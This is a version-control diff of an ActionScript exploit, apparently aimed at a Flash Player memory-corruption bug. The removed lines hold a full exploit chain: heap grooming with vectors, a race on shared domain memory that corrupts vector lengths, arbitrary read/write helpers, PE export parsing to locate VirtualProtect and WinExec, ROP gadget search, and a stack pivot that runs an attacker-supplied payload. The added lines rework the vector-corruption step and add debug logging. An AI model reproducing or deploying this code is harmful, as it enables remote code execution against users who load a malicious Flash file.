@@ -23,8 +23,8 @@ import mx.utils.Base64Decoder
2323
2424public class Main extends Sprite
2525{
26- private var ov: Vector .< Object > = new Vector .< Object > (25600 )
27- private var uv: Vector .< uint > = new Vector .< uint >
26+ private var ov: Vector .< Object > = new Vector .< Object > (80000 )
27+ private var uv: Vector .< uint >
2828 private var ba: ByteArray = new ByteArray ()
2929 private var worker: Worker
3030 private var mc: MessageChannel
@@ -39,26 +39,28 @@ public class Main extends Sprite
3939
4040 private function mainThread ():void
4141 {
42- var b64_payload: String = LoaderInfo (this . root . loaderInfo ). parameters . sh
43- var pattern: RegExp = / / g ;
44- b64_payload = b64_payload. replace (pattern, "+" )
45- b64. decode (b64_payload)
46- payload = b64. toByteArray (). toString ()
42+ // var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
43+ // var pattern:RegExp = / /g;
44+ // b64_payload = b64_payload.replace(pattern, "+")
45+ // b64.decode(b64_payload)
46+ // payload = b64.toByteArray().toString()
4747
4848 ba. length = 0x1000
4949 ba. shareable = true
5050 for (var i: uint = 0 ; i < ov. length ; i++ ) {
51- ov[ i] = new Vector .< Object > (1014 )
52- ov[ i][ 0 ] = ba
53- ov[ i][ 1 ] = this
51+ ov[ i] = new Vector .< uint > (1014 )
52+ ov[ i][ 0 ] = 0xdeedbeef
5453 }
55- for (i = 0 ; i < ov. length ; i += 2 ) delete (ov[ i] )
54+ for (i = 0 ; i < ov. length / 2 ; i += 2 ) {
55+ delete (ov[ i] )
56+ }
5657 worker = WorkerDomain. current . createWorker(this . loaderInfo . bytes )
5758 mc = worker. createMessageChannel(Worker. current )
5859 mc. addEventListener (Event . CHANNEL_MESSAGE , onMessage)
5960 worker. setSharedProperty("mc" , mc)
6061 worker. setSharedProperty("ba" , ba)
6162 ApplicationDomain . currentDomain . domainMemory = ba
63+ Logger. log ("starting..." )
6264 worker. start ()
6365 }
6466
@@ -70,141 +72,37 @@ public class Main extends Sprite
7072 ov[ 0 ] = new Vector .< uint > (1022 )
7173 mc. send ("" )
7274 while (mc. messageAvailable);
73- ov [ 0 ][ 0 ] = ov [ 0 ][ 0x403 ] - 0x18 - 0x1000
74- ba . length = 0x500000
75- var buffer : uint = vector_read(vector_read( ov[ 0 ][ 0x408 ] - 1 + 0x40 ) + 8 ) + 0x100000
76- var main : uint = ov [ 0 ][ 0x409 ] - 1
77- var vtable : uint = vector_read(main)
78- vector_write(vector_read(ov [ 0 ][ 0x408 ] - 1 + 0x40 ) + 8 )
79- vector_write(vector_read( ov[ 0 ][ 0x408 ] - 1 + 0x40 ) + 16 , 0xffffffff )
80- mc. send (ov [ 0 ][ 0 ] . toString () + "/" + buffer . toString () + "/" + main . toString () + "/" + vtable . toString () )
75+ for ( var i : uint = 0 ; i < 20000 ; i ++ ) {
76+ if (ov [ 0 ][ i ] == 1014 && ov [ 0 ][ i + 2 ] == 0xdeedbeef ) {
77+ ov[ 0 ][ i ] = 0xffffffff
78+ break
79+ }
80+ }
81+ ov[ 0 ][ 0xfffffffe ] = 1014
82+ mc. send ("" )
8183 }
8284
8385 private function onMessage (e :Event ):void
8486 {
85- casi32(0 , 1022 , 0xFFFFFFFF )
86- if (ba. length != 0xffffffff ) mc. receive ()
87+ Logger. log ("[*] onMessage" )
88+ var mod: uint = casi32(0 , 1022 , 0xFFFFFFFF )
89+ Logger. log ("[*] onMessage - mod: " + mod. toString ())
90+ if (mod == 1022 ) mc. receive ()
8791 else {
88- ba. endian = "littleEndian"
89- var data : Array = (mc. receive () as String ). split ("/" )
90- byte_write(parseInt (data [ 0 ] ))
91- var buffer: uint = parseInt (data [ 1 ] ) as uint
92- var main: uint = parseInt (data [ 2 ] ) as uint
93- var vtable: uint = parseInt (data [ 3 ] ) as uint
94- var flash: uint = base (vtable)
95- var ieshims: uint = module ("winmm.dll" , flash)
96- var kernel32: uint = module ("kernel32.dll" , ieshims)
97-
98- var virtualprotect: uint = procedure("VirtualProtect" , kernel32)
99- var winexec: uint = procedure("WinExec" , kernel32)
100- var xchgeaxespret: uint = gadget("c394" , 0x0000ffff , flash)
101- var xchgeaxesiret: uint = gadget("c396" , 0x0000ffff , flash)
102-
103- //CoE
104- byte_write(buffer + 0x30000 , "\x b8" , false ); byte_write(0 , vtable, false ) // mov eax, vtable
105- byte_write(0 , "\x bb" , false ); byte_write(0 , main, false ) // mov ebx, main
106- byte_write(0 , "\x 89\x 03" , false ) // mov [ebx], eax
107- byte_write(0 , "\x 87\x f4\x c3" , false ) // xchg esp, esi # ret
108-
109- byte_write(buffer+ 0x200 , payload);
110- byte_write(buffer + 0x20070 , xchgeaxespret)
111- byte_write(buffer + 0x20000 , xchgeaxesiret)
112- byte_write(0 , virtualprotect)
113-
114- // VirtualProtect
115- byte_write(0 , winexec)
116- byte_write(0 , buffer + 0x30000 )
117- byte_write(0 , 0x1000 )
118- byte_write(0 , 0x40 )
119- byte_write(0 , buffer + 0x100 )
120-
121- // WinExec
122- byte_write(0 , buffer + 0x30000 )
123- byte_write(0 , buffer + 0x200 )
124- byte_write(0 )
125-
126- byte_write(main, buffer + 0x20000 )
127- toString ()
128- }
129- }
130-
131- private function vector_write (addr :uint , value :uint = 0 ):void
132- {
133- addr > ov[ 0 ][ 0 ] ? ov[ 0 ][ (addr - uv[ 0 ] ) / 4 - 2 ] = value : ov[ 0 ][ 0xffffffff - (ov[ 0 ][ 0 ] - addr) / 4 - 1 ] = value
134- }
135-
136- private function vector_read (addr :uint ):uint
137- {
138- return addr > ov[ 0 ][ 0 ] ? ov[ 0 ][ (addr - ov[ 0 ][ 0 ] ) / 4 - 2 ] : ov[ 0 ][ 0xffffffff - (ov[ 0 ][ 0 ] - addr) / 4 - 1 ]
139- }
140-
141- private function byte_write (addr :uint , value :* = 0 , zero :Boolean = true ):void
142- {
143- if (addr) ba. position = addr
144- if (value is String ) {
145- for (var i: uint ; i < value . length ; i++ ) ba. writeByte (value . charCodeAt (i))
146- if (zero) ba. writeByte (0 )
147- } else ba. writeUnsignedInt (value )
148- }
149-
150- private function byte_read (addr :uint , type :String = "dword" ):uint
151- {
152- ba. position = addr
153- switch (type ) {
154- case "dword" :
155- return ba. readUnsignedInt ()
156- case "word" :
157- return ba. readUnsignedShort ()
158- case "byte" :
159- return ba. readUnsignedByte ()
160- }
161- return 0
162- }
163-
164- private function base (addr :uint ):uint
165- {
166- addr &= 0xffff0000
167- while (true ) {
168- if (byte_read(addr) == 0x00905a4d ) return addr
169- addr -= 0x10000
170- }
171- return 0
172- }
173-
174- private function module (name :String , addr :uint ):uint
175- {
176- var iat: uint = addr + byte_read(addr + byte_read(addr + 0x3c ) + 0x80 ), i: int = - 1
177- while (true ) {
178- var entry: uint = byte_read(iat + (++ i) * 0x14 + 12 )
179- if (! entry) throw new Error ("FAIL!" );
180- ba. position = addr + entry
181- if (ba. readUTFBytes (name . length ). toUpperCase () == name . toUpperCase ()) break
92+ Logger. log ("[*] onMessage - Searching corrupted vector..." )
93+ for (var i: uint = 0 ; i < ov. length ; i++ ) {
94+ if (ov[ i] . length == 0xffffffff ) {
95+ uv = ov[ i]
96+ } else {
97+ ov[ i] = null
98+ }
99+ }
100+ if (uv == null ) {
101+ Logger. log ("not found" )
102+ return
103+ }
104+ Logger. log ('whooray: ' + uv. length . toString (16 ))
182105 }
183- return base (byte_read(addr + byte_read(iat + i * 0x14 + 16 )))
184- }
185-
186- private function procedure (name :String , addr :uint ):uint
187- {
188- var eat: uint = addr + byte_read(addr + byte_read(addr + 0x3c ) + 0x78 )
189- var numberOfNames: uint = byte_read(eat + 0x18 )
190- var addressOfFunctions: uint = addr + byte_read(eat + 0x1c )
191- var addressOfNames: uint = addr + byte_read(eat + 0x20 )
192- var addressOfNameOrdinals: uint = addr + byte_read(eat + 0x24 )
193- for (var i: uint = 0 ; ; i++ ) {
194- var entry: uint = byte_read(addressOfNames + i * 4 )
195- ba. position = addr + entry
196- if (ba. readUTFBytes (name . length + 2 ). toUpperCase () == name . toUpperCase ()) break
197- }
198- return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2 , "word" ) * 4 )
199- }
200-
201- private function gadget (gadget :String , hint :uint , addr :uint ):uint
202- {
203- var find: uint = 0
204- var limit: uint = byte_read(addr + byte_read(addr + 0x3c ) + 0x50 )
205- var value : uint = parseInt (gadget, 16 )
206- for (var i: uint = 0 ; i < limit - 4 ; i++ ) if (value == (byte_read(addr + i) & hint)) break
207- return addr + i
208106 }
209107}
210108}
0 commit comments